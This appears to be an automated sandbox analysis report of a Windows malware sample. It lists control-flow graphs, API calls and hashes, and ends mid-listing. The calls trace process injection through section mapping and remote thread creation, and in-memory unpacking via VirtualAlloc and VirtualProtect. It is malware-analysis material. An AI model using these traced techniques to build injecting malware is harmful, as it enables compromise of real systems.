                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                  • Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
                                                                  • Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                  • Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 466 403103-403127 467 403246-40324b 466->467 468 40312d-403145 466->468 468->467 469 40314b-40315c 468->469 470 40315e-403167 469->470 471 40316c-40317a 470->471 471->471 472 40317c-403183 471->472 473 4031a5-4031ac 472->473 474 403185-4031a4 472->474 475 4031ce-4031d1 473->475 476 4031ae-4031cd 473->476 474->473 477 4031d3-4031d6 475->477 478 4031da 475->478 476->475 477->478 479 4031d8 477->479 478->470 480 4031dc-4031e1 478->480 479->480 480->467 481 4031e3-4031e6 480->481 481->467 482 4031e8-403243 RtlCreateUserThread NtTerminateProcess 481->482 482->467
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcessTerminateThreadUser
                                                                  • String ID:
                                                                  • API String ID: 1921587553-0
                                                                  • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                  • Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
                                                                  • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                  • Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 484 403257-40325f 485 4031f0-403243 RtlCreateUserThread NtTerminateProcess 484->485 486 403261-40327f 484->486 487 403246-40324b 485->487 492 403281 486->492 493 403286-403290 486->493 492->493 494 403283-403285 492->494 495 403292 493->495 496 403298-4032ba call 4012ec 493->496 494->493 495->496 497 403293-403297 495->497 502 4032be 496->502 502->502
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcessTerminateThreadUser
                                                                  • String ID:
                                                                  • API String ID: 1921587553-0
                                                                  • Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                  • Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
                                                                  • Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                  • Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 66 2ba003c-2ba0047 67 2ba0049 66->67 68 2ba004c-2ba0263 call 2ba0a3f call 2ba0e0f call 2ba0d90 VirtualAlloc 66->68 67->68 83 2ba028b-2ba0292 68->83 84 2ba0265-2ba0289 call 2ba0a69 68->84 86 2ba02a1-2ba02b0 83->86 88 2ba02ce-2ba03c2 VirtualProtect call 2ba0cce call 2ba0ce7 84->88 86->88 89 2ba02b2-2ba02cc 86->89 95 2ba03d1-2ba03e0 88->95 89->86 96 2ba0439-2ba04b8 VirtualFree 95->96 97 2ba03e2-2ba0437 call 2ba0ce7 95->97 99 2ba04be-2ba04cd 96->99 100 2ba05f4-2ba05fe 96->100 97->95 102 2ba04d3-2ba04dd 99->102 103 2ba077f-2ba0789 100->103 104 2ba0604-2ba060d 100->104 102->100 106 2ba04e3-2ba0505 102->106 107 2ba078b-2ba07a3 103->107 108 2ba07a6-2ba07b0 103->108 104->103 109 2ba0613-2ba0637 104->109 118 2ba0517-2ba0520 106->118 119 2ba0507-2ba0515 106->119 107->108 110 2ba086e-2ba08be LoadLibraryA 108->110 111 2ba07b6-2ba07cb 108->111 112 2ba063e-2ba0648 109->112 117 2ba08c7-2ba08f9 110->117 114 2ba07d2-2ba07d5 111->114 112->103 115 2ba064e-2ba065a 112->115 120 2ba07d7-2ba07e0 114->120 121 2ba0824-2ba0833 114->121 115->103 116 2ba0660-2ba066a 115->116 122 2ba067a-2ba0689 116->122 124 2ba08fb-2ba0901 117->124 125 2ba0902-2ba091d 117->125 126 2ba0526-2ba0547 118->126 119->126 127 2ba07e2 120->127 128 2ba07e4-2ba0822 120->128 123 2ba0839-2ba083c 121->123 129 2ba068f-2ba06b2 122->129 130 2ba0750-2ba077a 122->130 123->110 131 2ba083e-2ba0847 123->131 124->125 132 2ba054d-2ba0550 126->132 127->121 128->114 135 2ba06ef-2ba06fc 129->135 136 2ba06b4-2ba06ed 129->136 130->112 137 2ba084b-2ba086c 131->137 138 2ba0849 131->138 133 2ba05e0-2ba05ef 132->133 134 2ba0556-2ba056b 132->134 133->102 140 2ba056f-2ba057a 134->140 141 2ba056d 134->141 142 2ba074b 135->142 143 2ba06fe-2ba0748 135->143 136->135 137->123 138->110 144 2ba059b-2ba05bb 140->144 145 2ba057c-2ba0599 140->145 141->133 142->122 143->142 150 2ba05bd-2ba05db 144->150 145->150 150->132
                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02BA024D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2440325792.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2ba0000_A869.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: cess$kernel32.dll
                                                                  • API String ID: 4275171209-1230238691
                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                  • Instruction ID: b8fad2149ce1c72ead298f70c1fe5a9f46f924ad6fd9cff4a247a45f8ac33ccc
                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                  • Instruction Fuzzy Hash: 51527974A05229DFDB64CF68C994BACBBB1BF09304F1484D9E94DAB351DB30AA94CF14

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 465 415910-415a50 GetModuleHandleW GetProcAddress VirtualProtect
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(02B19CE8), ref: 004159EF
                                                                  • GetProcAddress.KERNEL32(00000000,0041BCD0), ref: 00415A2C
                                                                  • VirtualProtect.KERNELBASE(02B19B2C,02B19CE4,00000040,?), ref: 00415A4B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438988565.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_40b000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 2099061454-3916222277
                                                                  • Opcode ID: c9706728d37e00871e7f67ced595d0c79eb19ddcf454875c36666ff37d1ec3ad
                                                                  • Instruction ID: 9f4e34dfc4b6fe9394a1db25d0a6d7b53828682d58b9ddec5cea0b2bad73ce3c
                                                                  • Opcode Fuzzy Hash: c9706728d37e00871e7f67ced595d0c79eb19ddcf454875c36666ff37d1ec3ad
                                                                  • Instruction Fuzzy Hash: 3D3167149487C0CAE301CB78F8547823FA2EB25744F44847CD189873A5EFBA1524D7EE

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 503 2c1a683-2c1a69c 504 2c1a69e-2c1a6a0 503->504 505 2c1a6a2 504->505 506 2c1a6a7-2c1a6b3 CreateToolhelp32Snapshot 504->506 505->506 507 2c1a6c3-2c1a6d0 Module32First 506->507 508 2c1a6b5-2c1a6bb 506->508 509 2c1a6d2-2c1a6d3 call 2c1a342 507->509 510 2c1a6d9-2c1a6e1 507->510 508->507 514 2c1a6bd-2c1a6c1 508->514 515 2c1a6d8 509->515 514->504 514->507 515->510
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C1A6AB
                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 02C1A6CB
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2440499657.0000000002C17000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C17000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2c17000_A869.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 3833638111-0
                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                  • Instruction ID: 3074d2fe610f1fac76bff5bb135aba6031ac95f98f0ef69984cf2f0287dab1bc
                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                  • Instruction Fuzzy Hash: D0F0F6321017117FD7203BF89C8EB6EB2E8AF8A224F100128E643D15C0CB70E9059A61

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 516 2ba0e0f-2ba0e24 SetErrorMode * 2 517 2ba0e2b-2ba0e2c 516->517 518 2ba0e26 516->518 518->517
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,02BA0223,?,?), ref: 02BA0E19
                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,02BA0223,?,?), ref: 02BA0E1E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2440325792.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2ba0000_A869.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                  • Instruction ID: 6caa47b8ee7731fb4f42fe3c73b0a19dde9cf11d5998d059322002e2c43fd413
                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                  • Instruction Fuzzy Hash: AFD0123154512877DB003A94DC09BCD7B1CDF09B66F008451FB0DD9080C770954046E5

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 540 4019c0-4019c6 541 4019e7-401a10 540->541 542 4019c8-4019dd call 40127e 540->542 550 401a13-401a46 call 40127e Sleep call 4014fb 541->550 551 401a09-401a0c 541->551 559 401a55-401a5b 550->559 560 401a48-401a50 call 4015fb 550->560 551->550 563 401a60-401a65 559->563 564 401a69 559->564 560->559 565 401a6c-401a9a call 40127e 563->565 564->563 564->565
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                                  • Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
                                                                  • Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                                  • Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                    • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                    • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                  • String ID:
                                                                  • API String ID: 4152845823-0
                                                                  • Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                  • Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
                                                                  • Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                  • Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                    • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                    • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                  • String ID:
                                                                  • API String ID: 4152845823-0
                                                                  • Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                  • Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
                                                                  • Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                  • Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                    • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                    • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                  • String ID:
                                                                  • API String ID: 4152845823-0
                                                                  • Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                  • Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
                                                                  • Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                  • Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                    • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                    • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                  • String ID:
                                                                  • API String ID: 4152845823-0
                                                                  • Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                  • Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
                                                                  • Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                  • Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F
                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C1A393
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2440499657.0000000002C17000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C17000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2c17000_A869.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                  • Instruction ID: 56066f9a633f585d50299a7d86ec2fc093691c4f2d305a1fe8a422ef361aacd7
                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                  • Instruction Fuzzy Hash: 9E113C79A40208FFDB01DF98C985E98BBF5AF08351F058095F9489B361D371EA50EF80
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                    • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                    • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                  • String ID:
                                                                  • API String ID: 4152845823-0
                                                                  • Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                  • Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
                                                                  • Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                  • Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                    • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                    • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                  • String ID:
                                                                  • API String ID: 4152845823-0
                                                                  • Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                  • Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
                                                                  • Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                  • Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B
                                                                  APIs
                                                                  • LocalAlloc.KERNELBASE(00000000,02B19CE4,00415F7B), ref: 004158E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438988565.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_40b000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: AllocLocal
                                                                  • String ID:
                                                                  • API String ID: 3494564517-0
                                                                  • Opcode ID: edc34b9f6b4820ea05e34d55aad0c07fdf7bc1d6d5b6794533697c47ab2511c9
                                                                  • Instruction ID: d7b87d211da148203f6924bb85ac0980f9e485e76abd759aca5fb629b3ee17cc
                                                                  • Opcode Fuzzy Hash: edc34b9f6b4820ea05e34d55aad0c07fdf7bc1d6d5b6794533697c47ab2511c9
                                                                  • Instruction Fuzzy Hash: D3B092B0DC46409BD7008BA0A814B513AA4E308742F404461F505C2180DA2014208F14
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
                                                                  • Instruction ID: 6725721ff3489d431dd836171e340eb16c8ebd58ca09b28f7b875ac3b9798d56
                                                                  • Opcode Fuzzy Hash: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
                                                                  • Instruction Fuzzy Hash: 43F0273A30669697DB135E7CD0009CCFF10FD6B6207B88BD2D0C09A141C222845BCB90
                                                                  APIs
                                                                  • BuildCommDCBA.KERNEL32(00000000,?), ref: 00415B11
                                                                  • WritePrivateProfileStringA.KERNEL32(00418384,0041835C,00418330,0041830C), ref: 00415B35
                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415B3D
                                                                  • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415B7D
                                                                  • GetComputerNameW.KERNEL32(?,?), ref: 00415B91
                                                                  • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415B9F
                                                                  • OpenJobObjectA.KERNEL32(00000000,00000000,004183B4), ref: 00415BAE
                                                                  • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415BBF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438988565.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_40b000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                                                  • String ID: -
                                                                  • API String ID: 113859268-2547889144
                                                                  • Opcode ID: b7bb9a5b8577f05c9444bb152fbeed06ee10d6e36786bb58eab085b6d1570c50
                                                                  • Instruction ID: c8ce66b9030aa5128248987ed1e6c42ca1346a4c7388fc80dbaa79af2878fbf1
                                                                  • Opcode Fuzzy Hash: b7bb9a5b8577f05c9444bb152fbeed06ee10d6e36786bb58eab085b6d1570c50
                                                                  • Instruction Fuzzy Hash: E721FB31A88348EBD7209F94DD85FDD7B70FB4CB51F1440A9F649AA1C0CAB42AC48B5D
                                                                  APIs
                                                                  • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415C34
                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415C4F
                                                                  • HeapDestroy.KERNEL32(00000000), ref: 00415C6E
                                                                  • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415C76
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438988565.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_40b000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                                                  • String ID:
                                                                  • API String ID: 367530164-0
                                                                  • Opcode ID: 40611bbb9540bf7089aa309a5be8a53c8ce5539108cd5addca110bf7d1443001
                                                                  • Instruction ID: dfb90add5c3ca1356a5d467ff049daf0d79d45e69348a2a8c246a34d756d5ef6
                                                                  • Opcode Fuzzy Hash: 40611bbb9540bf7089aa309a5be8a53c8ce5539108cd5addca110bf7d1443001
                                                                  • Instruction Fuzzy Hash: F901A770A84604DBD750EBB4ED457DA77B8FB0C746F404076F60AD7280DA7419548B96

                                                                  Execution Graph

                                                                  Execution Coverage:11.7%
                                                                  Dynamic/Decrypted Code Coverage:18.9%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:175
                                                                  Total number of Limit Nodes:10
                                                                  execution_graph 3580 4019c0 3581 4019c8 3580->3581 3582 4019e7 3580->3582 3583 401a29 Sleep 3582->3583 3584 4014fb 7 API calls 3583->3584 3585 401a44 3584->3585 3586 4015fb 7 API calls 3585->3586 3587 401a55 3585->3587 3586->3587 3524 402f42 3526 402f18 3524->3526 3525 4019e0 15 API calls 3527 40304f 3525->3527 3526->3525 3526->3527 3540 403103 3541 403246 3540->3541 3542 40312d 3540->3542 3542->3541 3543 4031f0 RtlCreateUserThread NtTerminateProcess 3542->3543 3543->3541 3453 401606 3453->3453 3454 401609 3453->3454 3455 4016af NtDuplicateObject 3454->3455 3464 4017cb 3454->3464 3456 4016cc NtCreateSection 3455->3456 3455->3464 3457 4016f2 NtMapViewOfSection 3456->3457 3458 40174c NtCreateSection 3456->3458 3457->3458 3459 401715 NtMapViewOfSection 3457->3459 3460 401778 3458->3460 3458->3464 3459->3458 3461 401733 3459->3461 3462 401782 NtMapViewOfSection 3460->3462 3460->3464 3461->3458 3463 4017a9 NtMapViewOfSection 3462->3463 3462->3464 3463->3464 3306 416090 3309 415c90 3306->3309 3308 416095 3310 415c9d 3309->3310 3311 415e80 3310->3311 3312 415d57 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW 3310->3312 3313 415e90 SetCommState 3311->3313 3317 415ea9 3311->3317 3314 415dbd 7 API calls 3312->3314 3313->3311 3315 415e71 3314->3315 3316 415e6a PulseEvent 3314->3316 3315->3311 3316->3315 3318 415f76 3317->3318 3319 415eb6 7 API calls 3317->3319 3330 4158e0 LocalAlloc 3318->3330 3326 415f4a 3319->3326 3323 415fcd 3332 415c00 3323->3332 3324 415f7b LoadLibraryA 3331 415910 GetModuleHandleW GetProcAddress VirtualProtect 3324->3331 3326->3318 3327 415fd2 3328 416009 InterlockedDecrement 3327->3328 3329 41601f 3327->3329 3328->3327 3329->3308 3330->3324 3331->3323 3333 415c29 QueryDosDeviceW 3332->3333 3334 415c3a 3332->3334 3333->3334 3343 415aa0 3334->3343 3337 415c55 3346 415ae0 3337->3346 3338 415c4d FreeEnvironmentStringsA 3338->3337 3341 415c7c 3341->3327 3342 415c6c HeapDestroy GetNumaHighestNodeNumber 3342->3341 3344 415ab1 FatalAppExitA GetModuleHandleW 3343->3344 3345 415ac3 3343->3345 3344->3345 3345->3337 3345->3338 3347 415aed 3346->3347 3348 415b19 3347->3348 3349 